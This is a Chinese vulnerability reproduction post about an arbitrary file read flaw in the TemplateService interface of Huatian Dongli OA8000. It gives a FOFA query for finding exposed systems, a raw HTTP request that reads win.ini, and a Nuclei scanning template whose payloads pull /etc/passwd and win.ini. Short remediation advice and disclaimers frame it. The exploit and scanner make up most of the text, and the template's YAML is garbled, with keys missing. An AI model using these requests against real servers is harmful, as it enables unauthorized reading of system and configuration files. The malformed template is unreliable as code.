免责声明
此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们!
漏洞概述
华天动力OA系统中的TemplateService接口存在一个任意文件读取漏洞,攻击者可以通过构造恶意请求,利用该漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。攻击者可能通过利用此漏洞获取敏感信息,导致潜在的信息泄漏风险。
FoFa
app="华天动力-OA8000"
漏洞复现
POST /OAapp/bfapp/buffalo/TemplateService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Type: text/xml
Content-Length: 101
<buffalo-call>
<method>getHtmlContent</method>
<string>c:/windows/win.ini</string>
</buffalo-call>
Nuclei Poc
id: htdl-TemplateService-readfile
info:
name: htdl-TemplateService-readfile
author: rain
severity: high
metadata:
app="华天动力-OA8000" :
http:
raw:
|
POST /OAapp/bfapp/buffalo/TemplateService HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 :
text/xml :
101 :
<buffalo-call>
<method>getHtmlContent</method>
<string>{{path}}</string>
</buffalo-call>
attack: batteringram
payloads:
path:
/etc/passwd
c:/windows/win.ini
true :
and :
matchers:
type: dsl
dsl:
'contains_all(body,"root:") || contains_all(body,"[fonts]")'
修复建议
-
及时更新OA系统至最新版本,以确保漏洞修复。 -
对TemplateService等涉及文件读取的服务进行严格的访问控制,限制其读取文件的权限。 -
对系统进行定期安全审计,检查是否存在其他潜在的漏洞。
原文始发于微信公众号(知黑守白):【漏洞复现】华天动力-TemplateService-任意文件读取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论